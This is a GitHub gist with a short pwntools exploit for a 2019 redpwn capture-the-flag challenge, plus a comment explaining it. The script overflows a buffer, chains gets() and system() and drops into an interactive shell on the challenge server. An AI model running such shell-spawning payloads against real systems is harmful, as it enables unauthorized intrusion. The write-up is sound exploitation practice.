Skip to content

Instantly share code, notes, and snippets.

@swt02026
Last active August 19, 2019 09:52
Show Gist options
  • Save swt02026/2053c55a681c07d3930016438aeaff02 to your computer and use it in GitHub Desktop.
Save swt02026/2053c55a681c07d3930016438aeaff02 to your computer and use it in GitHub Desktop.
from pwn import *
r=remote('chall2.2019.redpwn.net',4002)
gets=0x080483b0
system=0x0804b010
buf=0x0804a000
payload = 'a'*26 + p32(0x0804a100) + p32(gets) + p32(system) + p32(buf) + p32(buf)
r.sendlineafter('challenge', payload)
r.interactive()
Copy link

ghost commented Aug 19, 2019

hey mate
could you please explain how it works?)

@swt02026
Copy link
Author

swt02026 commented Aug 19, 2019

Sorry, I forget comment.
It will open stdin by gets, then you type '/bin/sh' into 0x0804a000 manually.
It will calling system(0x0804a000).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment